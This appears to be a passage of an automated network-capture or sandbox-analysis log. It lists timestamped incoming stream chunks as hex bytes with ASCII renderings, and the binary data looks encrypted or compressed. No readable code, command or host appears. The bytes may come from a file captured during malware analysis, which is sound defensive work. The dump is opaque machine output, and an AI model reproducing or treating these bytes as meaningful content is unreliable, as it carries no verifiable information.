2022-09-11 08:16:25 UTC | 18 | IN | Data Raw: 17 b1 dd 19 e1 d4 fc b3 60 89 52 c9 e3 26 d4 1a ec c4 b7 96 2a 13 de de 26 d8 96 30 ce 7b 82 c3 f4 7e fd e6 bd e1 e9 36 94 d1 65 99 5f 26 eb ba 3e a6 2e 66 a4 6c ed df b3 41 8f 1a c7 5b ef 11 3b 7b dc 31 92 8f 1e 84 8d 4d 70 b0 3d d4 59 ef 35 67 36 69 27 53 1d 19 1c ec 16 d0 39 08 4d a9 d6 cd c2 08 32 fb 01 cd 60 fe 38 c3 7d f4 b8 54 5a 92 32 a6 64 f0 fd 36 6b 36 03 4d 2e 99 36 33 d7 45 80 c3 51 ed e1 dc 1f d4 e9 d0 36 3a e1 b8 b6 11 96 13 77 8f ba 36 3d f5 91 8f 9d 83 66 c5 fd a5 45 46 ab 58 46 ec 62 11 be c5 0b ba 1e 45 8c 2b 8a f7 18 87 78 dd 02 84 49 b5 0e db 3d 40 f3 80 32 3a c1 c9 e8 93 db 45 8a a0 31 a6 cb b8 2a 58 06 54 f4 3a 5a 07 29 a7 17 a3 f4 03 b2 69 3e 23 95 0d f9 a4 35 a9 6b cd 00 60 aa 10 32 4b 7e b7 e3 69 29 2a 9b e7 ad 4d 7d 11 be b9 9d
Data Ascii: `R&*&0{~6e_&>.flA[;{1Mp=Y5g6i'S9M2`8}TZ2d6k6M.63EQ6:w6=fEFXFbE+xI=@2:E1*XT:Z)i>#5k`2K~i)*M}
2022-09-11 08:16:25 UTC | 19 | IN | Data Raw: f7 c5 4d ab 31 2c b3 12 9f 96 d5 b0 b3 7e bd 94 47 74 52 89 c7 6a 07 a2 85 a3 1a 6d 1e 02 3f 8e a4 6a 06 bf a0 e4 0f c0 94 95 83 05 ce 85 a6 e1 2c 8f 1f f5 61 6e f6 d3 92 12 09 55 ff 0e b5 d2 f8 9d 98 0e f0 76 b5 0a d7 ad 7e 05 ca 2d e0 7e bf e9 7a 4c d7 1d d8 32 74 05 49 60 af 6d 84 1e a6 d3 48 6b c1 0b a6 e9 e0 ba b3 18 d4 bd 2f b1 22 19 c7 7f 9c 58 b7 75 9e 53 19 7e 56 31 a4 0b c5 69 d9 97 26 f3 bf eb cc dc ff ef 15 59 24 a5 63 62 27 65 a3 e1 f2 37 a0 d3 13 eb e4 42 4b 53 0d fd d8 62 87 32 1e 5c 77 96 66 07 b7 fa a4 79 37 69 4c 80 af e0 a4 b4 38 a4 ab 82 3e 1a a2 6a ac d3 53 29 f6 d2 ec c1 51 6b a7 94 ad ea 69 23 e3 a6 73 b7 ab e3 5e 9d a1 6a a5 7c 9f de 38 6e a0 69 ad 41 05 e6 c9 9c 9d a1 c6 43 fd 99 26 17 5b eb e7 ab 26 41 c7 a0 26 38 74 eb 2c 60 26
Data Ascii: M1,~GtRjm?j,anUv~-~zL2tI`mHk/"XuS~V1i&Y$cb'e7BKSb2\wfy7iL8>jS)Qki#s^j|8niAC&[&A&8t,`&
2022-09-11 08:16:25 UTC | 21 | IN | Data Raw: 61 a2 85 6d 60 c5 43 cf 61 57 3b 0d 49 47 08 01 aa 33 f0 62 ee 24 42 0f ea ed 20 10 9e e4 f9 97 e3 ff 1b b7 1e a3 0a da 77 c7 68 f4 5b c7 43 fe 1a b7 7a a3 67 aa 6e a6 69 30 ff a3 6a a0 0f 95 ae 04 b9 69 96 4a 55 b7 4f 93 e7 7e 8f 16 bb 47 5a e9 14 97 ee 13 5a 02 9a c2 5a cc 31 97 c5 38 5a 6b 97 96 a6 68 6e a0 9a 1f 71 a2 b7 59 13 13 d2 0c 6b a7 6a fa 7b 16 b6 2c 90 d6 38 bf 44 4b e4 2e 6e d8 d4 86 88 8e b1 22 39 81 ef dd eb fb c3 59 17 2c ed 65 a8 51 db 1b e3 d5 e5 e7 a1 58 a3 6e e3 2d 7e 7e a0 5c 95 a7 18 5c 10 28 06 49 af 16 f6 6e 0a ba f5 6d f2 79 d4 53 0e ad 00 58 80 22 ea a0 0d fc 08 e3 27 a2 af 87 ca d7 59 8e 02 5a 80 18 18 0f 9d ab 20 2e 08 fd 1b 76 7a 67 ef 02 48 ba 46 d1 7f 1f f0 be 63 e9 47 36 fb 52 df e2 7e e1 56 c0 2f 10 80 da a3 05 7c 36 be
Data Ascii: am`CaW;IG3b$B wh[Czgni0jiJUO~GZZZ18ZkhnqYkj{,8DK.n"9Y,eQXn-~~\\(InmySX"'YZ .vzgHFcG6R~V/|6
2022-09-11 08:16:25 UTC | 22 | IN | Data Raw: d4 c2 f6 f1 f3 2b a2 e2 28 90 8e 3b d2 17 fe 3a 67 aa d3 1d 97 99 a4 4b 4d 7b 89 55 24 a0 b6 d3 4e a6 e0 a0 c2 53 46 96 ef d8 5d 9a 50 4d cb ad bd 7b 26 5b 90 e4 3e f1 2d 94 08 1e 98 5b 9e 8c 53 ef dc 94 c4 05 21 a0 aa 19 62 94 93 53 dc 19 e3 2f 57 99 14 c3 35 e7 a1 95 08 12 0c 11 5c 1c d4 4d 46 ac 28 a5 c9 1c cf 5a 6f 12 11 3f 79 0d 1d b7 dd 10 2a 6c 58 c5 df c1 dc 91 d1 19 a1 e1 69 27 26 a5 cd 18 a4 87 d5 ac a3 a6 6a 6b b5 80 67 4e c7 7c f1 4a 85 64 8b 48 ad 54 b2 74 34 b9 24 fc f7 ff bd a0 ce 81 66 f0 3b 6a 0b 49 6d 07 87 69 90 5e a4 59 97 69 c2 30 9b 69 9c d2 2c 39 79 e7 20 95 27 95 d2 17 24 e0 f7 c4 c8 6e 8b d2 a7 6a 21 67 a9 ae e6 f4 6f bc b9 f0 33 62 3f 64 2a 11 5d 1c d8 61 2c e7 2a 2f 37 cb f8 4a ca 07 20 33 79 ce 01 f4 27 f6 a1 e8 09 c2 02 15 f3
                                                          Data Ascii: +(;:gKM{U$NSF]PM{&[>-[S!bS/W5\MF(Zo?y*lXi'&jkgN|JdHTt4$f;jImi^Yi0i,9y '$nj!go3b?d*]a,*/7J 3y'
                                                          2022-09-11 08:16:25 UTC23INData Raw: 80 bd 08 c6 f1 a2 68 f8 2a 37 82 b1 b5 b6 1e 6f 21 3f 47 c8 83 3c f4 a9 6a 29 01 26 c4 92 99 18 72 03 e1 2d 95 6e eb 73 f6 ad 1a db b2 69 9c be c6 fb 6b f3 b3 a4 96 d1 28 90 1f 25 28 66 64 cf 49 9e 87 4e 55 6e 67 20 79 a5 7d 87 3d 87 d2 a7 e1 f7 13 cf 49 c4 18 31 5a d5 ee ef f1 34 a2 fb fe 26 ee 1a 22 42 48 f0 73 6f cd d4 76 8b 5a cb 90 10 c6 2a 8a d5 eb c5 5e 94 2f 19 39 cd 44 1f 12 a9 57 69 ba ad b0 95 99 d5 61 bd 07 6d ab a1 62 4f 8e b3 0e d8 0b c5 5a c9 d4 32 c8 7b 6d b3 85 5a 02 c9 f6 69 d4 02 d8 5a 97 5a 6e 29 92 52 52 e9 9c bf 88 5a 97 5a 9d 50 98 52 82 1a 2f a6 fd e0 71 fb 25 9e c8 f5 80 b7 d5 18 1e 69 23 20 2f c9 e3 49 25 69 04 c7 b2 3b a1 26 00 29 dc db 44 d1 7e 51 b8 93 8d 74 38 5d 05 ec a0 b1 e9 74 c8 7e 98 68 6c fa c7 15 50 7e 8a 60 ea dd 15
                                                          Data Ascii: h*7o!?G<j)&r-nsik(%(fdINUng y}=I1Z4&"BHsovZ*^/9DWiambOZ2{mZiZZn)RRZZPR/q%i# /I%i;&)D~Qt8]t~hlP~`
                                                          2022-09-11 08:16:25 UTC25INData Raw: 4f e0 e1 c1 48 d8 53 c1 ab 0a 26 d5 f5 86 2f cc 6d 8d 2c 13 f6 69 ec 02 ff 55 c8 88 5a 59 a5 9a 09 c8 74 3c 3a 73 75 b8 75 e0 00 47 6a 96 43 bf fe e9 a4 b3 a1 41 96 4e b2 30 f5 42 32 36 4f 25 83 00 cd 2a 8d aa 49 64 47 a3 ba ff 0e cb 6a 2a 87 56 5f 8b b2 14 cc 01 cd cb 66 0b c6 f5 4d cb 93 c0 dc bb 7a 1f 9b 14 f2 55 a5 74 3b e9 b4 10 c9 6f f6 da 42 73 37 0a 4f 7e 76 6b 5c 49 f5 c8 ca 67 2d f9 e9 80 3a d6 80 af c1 f9 b4 90 57 7c 4d 96 9b 22 09 a3 49 97 62 73 8e 9f f9 0a 34 32 52 e3 6b dd 55 d6 85 ed 42 96 39 ee a6 68 47 93 4c 82 52 92 3e aa 06 6e eb 8c 82 1d 91 01 12 82 92 64 cc a9 3f 01 57 ea 24 e5 aa e8 47 63 80 df d4 69 69 08 dd 44 f4 44 27 af 4f 43 2f 2d e0 3e 0e 51 25 c3 63 a9 cd 2b 01 49 12 9a 4d 84 b3 2a f4 2b ea 37 f6 68 59 05 83 be de f8 0d 69 80
                                                          Data Ascii: OHS&/m,iUZYt<:suuGjCAN0B26O%*IdGj*V_fMzUt;oBs7O~vk\Ig-:W|M"Ibs42RkUB9hGLR>nd?W$GciiDD'OC/->Q%c+IM*+7hYi
                                                          2022-09-11 08:16:25 UTC25INData Raw: a2 7b 30 d1 16 c2 14 ac f1 7d b6 a7 38 31 6f f9 8f 94 e2 f9 7d c7 93 35 1e cc d1 c8 07 56 af 72 bc f9 3e c3 96 56 de bd 96 cc 07 aa bc b5 82 4f 8c 59 92 36 f4 28 e6 3a e7 33 e0 94 4e 2b 0c a5 1e ca 62 86 8d 73 eb bc 07 e2 dd b8 22 d3 ec 07 d4 17 96 a2 74 20 9b f3 48 46 f5 3e 9f 95 4a 10 17 ba ff 67 fa 8a 83 33 d0 db ca ab c0 b6 c7 b1 c0 43 1d 1d 9f 0a d6 6b 86 71 36 17 56 1b 5d 0a b1 ae 1e c0 c0 5c 88 55 fa db ac 17 01 fe 7b ee 41 87 16 6d 0d 0d 4b 82 2c a8 83 03 be db 82 f2 eb 0e da 72 63 3e ce 2a 2a 1c 6c e0 31 06 61 0d 78 21 54 0d d7 b0 85 fe 20 e5 0f 8f 75 6a a2 97 8e 94 9a 6b bd 66 42 8c 4d ff 59 50 11 9a b3 ad 7d 18 21 80 32 ff 32 ff 32 9b 2a 83 0b 8a e4 9b 55 f3 f9 ac cc e6 4a f8 26 01 26 66 6f 82 ff af 47 c8 3f 08 47 a6 04 aa ef 35 08 ff 9d 7e 97
                                                          Data Ascii: {0}81o}5Vr>VOY6(:3N+bs"t HF>Jg3Ckq6V]\U{AmK,rc>**l1ax!T ujkfBMYP}!222*UJ&&foG?G5~
                                                          2022-09-11 08:16:25 UTC26INData Raw: 3b f2 92 4b 07 95 85 16 2c 62 ee 88 17 13 83 2d 05 5b f9 77 fc e2 63 6b d3 08 b2 31 d3 83 e5 a8 3c a6 fa 25 df 57 8b 42 4c 95 ba 54 1c 16 92 ab 6b 61 e8 66 16 47 b2 67 95 2c ab e2 7b 4f 61 a5 ea 23 e5 d4 17 dd e1 df a6 0d 00 f0 c2 8b ee 90 67 ea 48 a5 2c 62 17 5a 1b 09 3d 61 27 5b c9 a6 07 59 fc 14 0f 30 ca df 84 48 a1 a1 84 4a e6 ca e6 90 5d ed 07 ee a0 7a 23 37 b3 fe c0 54 b1 e5 61 e2 75 8e 1f 16 13 c3 7b 97 e1 fb 55 5e cf 13 6a 2a e7 f2 93 b2 ff 7b 9e b3 92 4b ea 9c 55 26 2e 4e 96 7a 62 62 8e fe 68 a7 fd a7 42 94 49 f7 95 4d 4b d7 2a b3 f9 e0 9e 9b a1 e5 4f 87 e8 05 ed 80 e7 29 4b 84 4b a8 2f cd 02 f0 54 a9 42 e0 51 3d 89 06 ef f1 52 cf 61 2c 15 54 73 de 06 b0 9d 7a 75 d2 6b 9b 50 f4 39 9f 22 06 f7 0e 3e 41 92 8c ab c2 3a 84 96 3c 0f da 76 c6 6a bd b1
                                                          Data Ascii: ;K,b-[wck1<%WBLTkafGg,{Oa#gH,bZ=a'[Y0HJ]z#7Tau{U^j*{KU&.NzbbhBIMK*O)KK/TBQ=Ra,TszukP9">A:<vj
                                                          2022-09-11 08:16:25 UTC28INData Raw: f9 35 a6 f1 8b df 0c 46 f4 b8 ab 62 9c db af 2e 64 67 af 62 af 5d 92 90 4d 66 bc 6f e3 25 0b b3 af a9 ea 80 4e 5f 6f 32 b3 db 1a bb bf 53 d0 2e 65 3f 71 5b 41 85 d3 b6 7f bc f2 a2 6d 01 b3 22 a9 da 8c 22 0e 3c aa cc 9e f4 39 d4 62 be 0c 91 5c b5 a1 6c 43 58 71 6a f7 3a be a8 0a 58 87 a7 2d 13 f8 a4 5b 86 b6 96 dd d5 8e 81 4d 62 e2 78 41 56 a0 21 12 b8 88 e3 d4 e9 c7 32 aa a4 1b c8 99 65 0d ac da 78 0e a3 55 56 ab e7 6d 96 11 77 82 05 b7 26 a3 a8 a9 14 97 69 5b 31 83 ad 64 69 d8 52 35 cc 9d 72 7c 90 4a d8 1f b3 62 77 7c 40 c6 1e c6 be 67 a8 ed 22 67 34 74 a0 c8 22 82 2e dd 11 f8 f6 ef ae a8 ed 27 09 80 58 81 0d 51 e0 43 fb 8d 38 a6 66 6c ea d2 93 b8 bc 2e e6 2b 2e 50 ad 08 3e e9 23 a0 47 7f 19 25 e7 3a 3c c9 85 66 6d a1 3d 30 eb a0 8b 2e 43 a7 ad 26 24 4e
                                                          Data Ascii: 5Fb.dgb]Mfo%N_o2S.e?q[Am""<9b\lCXqj:X-[MbxAV!2exUVmw&i[1diR5r|Jbw|@g"g4t".'XQC8fl.+.P>#G%:<fm=0.C&$N
                                                          2022-09-11 08:16:25 UTC29INData Raw: cf 22 a3 1a 05 37 e0 59 c5 b7 2a 22 2f 8c ba c3 6b 72 22 6d a0 75 7b fc 12 ac c1 dc 90 aa 61 26 72 da 8c 2a af cd cb eb ab a0 e1 b1 b9 e7 2a e2 ed e5 89 81 2c e3 63 2c 6f 26 68 26 97 99 62 ef 1e a8 9a 39 9e 5c fb 2c 1f da e9 26 5b 52 d0 b3 0a 2c 20 4d 87 5a 9f 66 27 f5 bb e7 29 73 bc 1e 9e 16 56 a7 e7 6d 2c f6 50 8d a7 1e 4e c5 e7 4d 53 6b 9e 38 39 28 3d f1 b1 61 20 60 af db 44 3e 4a 28 22 a8 24 84 db 7b 4e 02 e6 88 21 ae 36 eb 69 1c d0 9e fe 38 f5 0b c6 4d 73 cb 0f 01 d1 e2 11 7d f5 ec 80 7c 1b e3 86 24 d6 8f 9d 6e af 74 6a a7 57 66 5a 46 b0 a0 d3 1c 26 cf 1c a6 0c 0f fb c7 2e 09 22 3f 3e ec e4 e5 ed ca 0a 06 d0 5a d1 98 7d 2f e3 d9 a5 02 0e 60 9f 6c 80 1a 22 4c 40 b8 93 6c 60 61 8a b5 b8 e0 c1 fd d4 f1 ea 30 35 f6 2d 7a b6 21 6c db 17 f9 3e cd 20 85 a3
                                                          Data Ascii: "7Y*"/kr"mu{a&r**,c,o&h&b9\,&[R, MZf')sVm,PNMSk89(=a `D>J("${N!6i8Ms}|$ntjWfZF&."?>Z}/`l"L@l`a05-z!l>
                                                          2022-09-11 08:16:25 UTC30INData Raw: 74 d9 c3 00 96 4d 9a 4c c6 b8 a4 08 59 fe ff 92 5d 43 61 14 f7 7e a5 63 80 88 9d cb 3e 32 38 74 ba 60 51 cb f0 7c 77 aa a7 a8 6a 74 f2 28 b1 f9 e4 aa 87 71 5e da 09 8d 5f da d4 63 2e de a3 02 bf 11 5f a9 d5 ef dd 94 d5 3d 9b 40 46 ff fd fc 0c b2 b1 96 c1 3e 54 a7 8a ec 66 12 88 d2 32 97 3f f9 27 83 4a 65 a9 ef bd 95 9f 6b 18 ea af 6e 3c 6a 0f b6 3c ee 82 b5 9a f1 87 8a 0c 4b 2e 9e ed 0e 7b 64 ce 60 4c 27 3f 6f a3 25 80 bd ca 3e 78 ce e6 bf 40 bb 67 99 59 f8 10 9c 71 a6 a2 78 a3 89 70 09 e9 ef 11 87 56 8b 27 40 c8 90 4d fe a1 de 62 1d d5 1c 2d d2 96 84 88 28 02 88 e5 bd d8 c3 d2 55 86 10 48 99 be ab 23 38
                                                          Data Ascii: tMLY]Ca~c>28t`Q|wjt(q^_c._=@F>Tf2?'Jekn<j<K.{d`L'?o%>x@gYqxpV'@Mb-(UH#8
                                                          2022-09-11 08:16:25 UTC31INData Raw: 05 86 81 14 bc fd 3d ab b2 bc a8 fa f8 2e e3 de d3 7e 37 35 08 16 24 6f 51 53 e6 69 4f 9b 36 6f 5d 6f d6 78 30 dc 95 1b 66 db a1 e7 a2 88 bb 1a a7 82 68 b7 a2 6a db 2f 75 7e 26 15 f5 c5 a4 6a d5 84 1f 7d 62 cc f1 74 f4 74 f4 67 27 c5 0d f8 7b aa 4f 83 f4 3a ad e3 a2 10 99 fa de 31 09 5f 2f 1b 99 4b 59 d9 34 cc e0 23 d8 14 db 38 19 bf a1 61 9a 66 b4 be 53 ef a5 fb f2 1b f1 b7 68 5f d2 1d 5f e6 2b e0 86 72 cf f0 79 de 8e bd 99 86 20 ea 5e 91 0c 49 21 9d e3 6b 91 99 47 2c 7a 94 de 36 3e 83 bc 26 d8 14 d9 03 64 95 38 b8 bf 62 2c e6 b0 0c d5 5d 5d a3 4c 84 29 ae ec 45 44 99 14 13 20 0f b4 6b ac 53 62 cd 20 ad b4 6a d2 19 88 c0 8d e3 d3 6c f7 95 2d 17 47 47 44 4e a5 6a 2c f6 3b a6 e8 49 4a fc b6 ab 57 4b a4 d0 fc cf 80 63 87 ca 36 34 d4 4b 81 4b 82 9d 51 3f 00
                                                          Data Ascii: =.~75$oQSiO6o]ox0fhj/u~&j}bttg'{O:1_/KY4#8afSh__+ry ^I!kG,z6>&d8b,]]L)ED kSb jl-GGDNj,;IJWKc64KKQ?
                                                          2022-09-11 08:16:25 UTC32INData Raw: 3c da 96 69 26 4e 4a ac 6d 7d 27 98 8b bf f9 62 6b 48 c4 7b 55 4b e7 f8 37 e8 55 c4 2d f7 2c e1 4e 16 a5 38 0d 51 db de b1 29 a5 d3 85 f5 2f ed 19 81 fb f8 56 4e a3 7e 73 7a 74 2c 23 e4 2a ae 59 8f 5e 45 ab fd 0d 5f 75 78 64 64 45 4f ad a8 92 1d 05 48 b5 5f 41 8b aa c5 6c 62 24 77 a2 76 5a 53 6a 3c 31 23 2d 79 34 da 57 91 8a 52 87 e2 a1 89 c7 a5 fb b4 16 1f e0 7f 4b 96 11 57 1b f9 4a c6 a7 5e 24 b8 6b 43 8d c0 c7 8a 5c 34 86 ad 20 6e 2b 33 fc 8d 65 28 81 f2 5d 9c 97 99 31 eb 79 42 d0 44 a1 ef 69 69 24 be f2 a4 ad ad 85 66 cb 50 9c 1e 33 b7 18 55 10 e3 8d 4e 6d 68 c3 16 89 95 86 4d 8f 04 2d ed 5c c5 b1 ca 62 00 cf c1 ab 2b 87 65 8a e5 23 61 0c 00 36 76 1c 1b 61 a1 8c b4 a6 59 7d 10 82 cc 28 ac 23 d5 08 53 ae 44 cc ed 65 a4 b5 4b 9a 61 2d dc a9 a2 91 a0 ec
                                                          Data Ascii: <i&NJm}'bkH{UK7U-,N8Q)/VN~szt,#*Y^E_uxddEOH_Alb$wvZSj<1#-y4WRKWJ^$kC\4 n+3e(]1yBDii$fP3UNmhM-\b+e#a6vaY}(#SDeKa-
                                                          2022-09-11 08:16:25 UTC33INData Raw: d6 13 e3 55 50 7a b8 6a 94 90 e3 e3 92 d1 29 7e b7 50 d9 23 5a ef d4 2d 65 f9 4e 9b dd f6 09 2a d3 06 f9 9c 2c a6 26 fe f5 f7 59 b1 ec ff 79 62 2a a5 1d 79 12 b9 ab c2 ae 8f 9d 6a 65 84 34 39 c3 64 ff c9 20 e2 6f df de 63 22 3a 0a 92 f7 b7 a9 2e 96 fa 06 e8 a2 d2 0a cb 5c 7a f8 d5 5d 65 88 be 53 65 50 92 41 1a e1 b1 24 a5 e5 9f 51 af 6e e1 52 19 a5 62 af e1 b9 ae ec fb e7 2a 7e 10 df c5 88 1c 09 da b9 ce 24 12 7a 99 4a 40 a1 ff 61 9f 15 5b 4f b4 71 b4 21 30 7e 96 89 3b d5 c3 77 2d 25 cb ce a2 16 17 4e 04 b1 b5 25 c7 3e 12 ee 23 42 d3 0e f5 cb 6a aa 67 a7 e1 92 3b 54 38 e9 bb 2d d7 e2 47 32 86 ef c6 57 06 27 e1 2e ed 33 6e 31 11 5c 1d 4f 75 44 f2 5d 67 2d 5e f6 90 af 77 23 e9 50 c0 79 c1 82 9b bf d0 72 e9 60 54 98 e9 14 f4 08 28 20 a4 8b 9c 38 be 1a b2 ac
                                                          Data Ascii: UPzj)~P#Z-eN*,&Yyb*yje49d oc":.\z]eSePA$QnRb*~$zJ@a[Oq!0~;w-%N%>#Bjg;T8-G2W'.3n1\OuD]g-^w#Pyr`T( 8
                                                          2022-09-11 08:16:25 UTC35INData Raw: a3 ac e9 b0 3a 77 38 66 28 4e 79 9c bd 0c fd c7 ac e6 ed 60 26 be 4b 16 ae 1e 1d dd 92 a6 18 ac 98 69 23 98 8b fe e1 d3 06 eb 70 ea 98 dd 27 61 9d a1 10 69 d7 6c 90 61 65 10 1d 4c b3 33 37 54 d1 d4 51 17 9c 26 1d 71 c3 d0 e9 60 a5 26 a6 1a 02 bc ee a8 53 d1 2d 24 a6 e4 61 ef 2d e8 2d 9c 8b 76 a8 eb 98 d8 42 02 ac 13 96 6c 29 ed ab 50 6e 7f 8b 56 a0 59 26 e4 a4 ea 84 32 93 2d 10 23 19 74 ff a7 6a f1 47 e8 06 ef 4f fa 54 db 40 25 2a 73 ba a3 10 da 5f e8 e0 d9 3e bf 1e d4 20 52 d5 c7 ca 74 6e 18 78 4d 78 a5 2a e4 69 94 90 ed 2d 6f 55 62 fa 01 91 d0 3e b9 1f 90 ae ff 71 57 59 a8 d2 d6 21 2e ee ac b5 f3 ab 6a e3 f0 cc f1 c3 60 a6 e6 bb 32 26 1a 09 e1 fb 60 6d 2c a5 22 bf b0 aa 34 b7 ca 8e 99 00 1f 34 d1 ba 37 e5 e9 2e b2 3f ee 20 87 cc 47 4c d3 dd 0e 8d eb 2c
                                                          Data Ascii: :w8f(Ny`&Ki#p'ailaeL37TQ&q`&S-$a--vBl)PnVY&2-#tjGOT@%*s_> RtnxMx*i-oUb>qWY!.j`2&`m,"447.? GL,
                                                          2022-09-11 08:16:25 UTC36INData Raw: ce 65 71 fa c1 14 3a 2a db 91 b7 0b f1 78 97 67 98 58 a0 cd 12 ff a6 ea 2e a5 e9 04 60 d3 ae 7a a6 e3 68 20 20 27 3e 6b 3a 29 70 57 cd 02 30 6a 47 d5 87 e6 47 c4 65 a2 1f c5 8c 08 d9 06 60 69 77 ca 09 23 0f 80 6e d6 d1 1c c7 79 65 ad a1 7d fe f7 41 45 fe b2 f0 b7 66 e5 6b 0d b3 19 e0 aa f6 3f 2c 8a c8 e7 42 22 87 e5 3c 96 ca 07 13 72 ec c0 0e 22 57 df b2 49 51 8f e8 55 fb 7a 7b ac 85 7d 62 4f 54 c1 d4 a2 e7 64 b1 00 89 66 86 3c 79 56 a2 27 a5 e5 28 52 e5 5b 43 3a 06 dc 83 7b 0c cf 0e 07 bf 9a a6 38 34 88 8d 67 c8 40 e5 02 cc e6 a7 0b 0b 2b 2f e9 18 8e f6 3b 86 21 1f 11 25 65 96 16 60 77 45 82 16 b6 03 54
                                                          Data Ascii: eq:*xgX.`zh '>k:)pW0jGGe`iw#nye}AEfk?,B"<r"WIQUz{}bOTdf<yV'(R[C:{84g@+/;!%e`wET
                                                          2022-09-11 08:16:25 UTC36INData Raw: bc fe bc 19 d2 62 60 2a 18 0b db c8 21 b8 9b 72 d6 39 a0 c2 cd 1c 40 ae 13 00 ee d5 a6 07 b1 fa 55 a7 97 e3 82 0c 60 6b a6 58 1e 02 1f f2 6c 0a cf 42 8f fb 76 d5 4d 53 ca cb 49 ef d4 1b 9b 3b 13 3e 28 63 a0 5e 12 57 ae 55 2e e7 1c d2 cf 87 62 2e 22 6e fb bf 50 a1 14 c1 c6 d7 d6 72 c2 ca f5 e1 ab ad 5d 63 14 69 2f 66 9e a7 d6 2b f6 7e 2a 66 e2 28 25 62 26 66 20 ac e1 e8 5f 19 65 2f fa b2 6a ab ea 62 67 e3 a3 2b 3b 3a 4f e4 de 05 87 4a c4 f4 af ee a2 be 46 1b 86 4a f0 f1 2e 2b c0 68 a1 2c 8d a5 80 28 07 28 5a 80 a6 cf 1e ef 9b db 27 d1 5d d8 d8 0c 8f 79 86 02 7d a8 96 5a 5e 9d b8 ff e3 b8 40 9d 94 55 b9 7f 9d 44 b6 3a f1 62 b9 7b e3 10 89 f9 e2 8c 78 80 95 6c 83 7f b2 bf 6f 72 f7 4e d1 e5 2e 1e e9 04 1f b6 10 cd a7 4f d5 1b 2e af 7c 1d 4b b6 78 c7 8f fa 36
                                                          Data Ascii: b`*!r9@U`kXlBvMSI;>(c^WU.b."nPr]ci/f+~*f(%b&f _e/jbg+;:OJFJ.+h,((Z']y}Z^@UD:b{xlorN.O.|Kx6
                                                          2022-09-11 08:16:25 UTC37INData Raw: 17 f8 d4 5c 7a bf ed 64 6b 31 0c 48 9b d7 81 dd 68 f4 1d d0 17 d6 ed f5 3a 73 cb de ef 58 e1 fb c9 59 17 e0 e4 66 85 4c ed e2 a4 e8 4b 51 fa 58 e3 d5 e5 7a c0 a4 a3 91 e1 62 dc b7 a2 78 6a a7 95 24 2d 6b ef 5c 0c 34 06 60 43 d3 fa c4 99 91 ad 56 0f 41 d5 5e af 19 a1 3d 85 7e fa 0a 8e 64 8b 32 72 7d fa 92 ba b7 54 e5 35 4d ca 20 19 94 49 2c 29 c0 ea 5a d3 59 b7 07 88 7e 55 ab 34 90 31 65 17 eb d7 8f 26 e0 6b 99 82 a7 c7 e0 02 f3 38 f5 54 2f 8a e7 7b 09 80 9a c3 67 76 02 11 db 6a 2c 28 13 d0 9f 2f 1e c0 a1 69 0b e0 2a f3 66 f5 cf c2 4d 43 3b c9 c4 8e 28 71 8e 0e 06 2e 3e 7d 9e 21 13 59 c4 c8 a4 0d 9a 6e 73 27 a3 9b 71 8f a8 a1 62 0d ce 64 a7 8f 76 e1 95 0f 4a 2e f7 12 c7 60 a5 6a 07 c0 45 06 5f 6c fe 00 36 e1 9c 06 c3 00 81 81 63 49 96 9b 35 30 0f 9b 5d 19
                                                          Data Ascii: \zdk1Hh:sXYfLKQXzbxj$-k\4`CVA^=~d2r}T5M I,)ZY~U41e&k8T/{gvj,(/i*fMC;(q.>}!Yns'qbdvJ.`jE_l6cI50]
                                                          2022-09-11 08:16:25 UTC39INData Raw: 85 6c f4 0d 97 70 b8 4e 84 ab 8b e2 e5 aa 43 3c b3 69 b0 6f d2 8b 76 f2 67 f7 3e c7 40 13 ef f5 1a c8 58 84 2a 92 8b 82 57 e0 ee 99 a5 f8 ce 64 be 55 46 a5 19 07 37 d6 4e e2 0e 22 d7 5f b2 49 51 bf 1c 31 6d 89 f3 c7 d2 97 58 84 a6 b3 dc 5b f5 13 a7 6a 2a a2 4a 92 7a 62 a0 70 2f 0a bf 6a 2f 8e b3 1a dd 70 93 1a e7 7e 34 2d 6f eb 2e eb b2 ba e6 58 62 cc 9f 1b 2e fb a4 68 f1 0f 96 38 9f f2 1b 16 17 15 4d fb f3 3c 01 d7 bf 0c 01 7f dd 10 f7 6a 2a 62 b6 3e 65 af d7 8f f5 0b af 23 82 cf 27 76 1b 64 9c 8e f2 cd 34 fb 06 69 2f dc e6 72 c0 cd 63 09 84 2c 51 bc 62 54 4b 38 b4 0f 92 49 ae 00 2a 62 ae e6 a3 e7 fa 23 b2 b2 f7 3a 27 1c 07 5c 90 3c ee 69 2d fa 37 ff 64 5f 54 0b c4 69 f7 c5 5d 4b 86 03 09 ac d6 39 eb 04 2e ed 28 8c c7 6d 23 e9 80 af 42 7e 73 51 ed 1e 62
                                                          Data Ascii: lpNC<iovg>@X*WdUF7N"_IQ1mX[j*Jzbp/j/p~4-o.Xb.h8M<j*b>e#'vd4i/rc,QbTK8I*b#:'\<i-7d_Ti]K9.(m#B~sQb
                                                          2022-09-11 08:16:25 UTC40INData Raw: 63 a6 cb 07 60 2f 2d 6f 4d 8c ac 31 b7 2e 5d c4 69 1c c6 ec 87 44 4a 8a 4f bb de 3a f5 24 94 49 0f f0 19 7d ae ec 6e 2a a2 0a e8 f2 3f dc 2b d7 a2 bf b7 75 6a 59 49 c8 db 7b 79 59 4f ce 87 c8 f3 b6 66 26 78 f3 10 5c a2 c4 3f 11 64 38 73 66 a8 28 a2 05 e7 cc 3b 31 8c c2 c8 e3 21 f1 94 eb 8e 06 fb 88 62 a7 55 e3 2d c3 87 69 e3 2e 49 02 a4 ab 99 15 07 2b 08 a5 6a ae eb 1b d5 31 33 49 39 d5 d2 1d e3 1a 77 fa 68 a7 ae 6f 96 ec aa e8 a3 cb 0c 24 36 33 81 0f 6a 24 29 4f 4d b7 75 2c e9 2f d1 96 15 c3 f8 e4 ae 22 73 3e 29 4f c0 9d 52 d1 14 26 d7 93 e3 2e 66 42 44 e9 9f d1 e9 2e 6f a0 1e 98 a2 5c 16 a3 ad 4c 01 c8 42 8f c2 26 4f 83 79 b4 1f d2 7d 3b ae c4 c3 eb d7 e3 5a cf b2 fe 87 b3 92 5e 98 c5 a9 9b 36 7a 45 fc a6 c0 0a eb 66 be 19 32 c5 08 80 a2 39 e4 6e b3 85
                                                          Data Ascii: c`/-oM1.]iDJO:$I}n*?+ujYI{yYOf&x\?d8sf(;1!bU-i.I+j13I9who$63j$)OMu,/"s>)OR&.fBD.o\LB&Oy};Z^6zEf29n
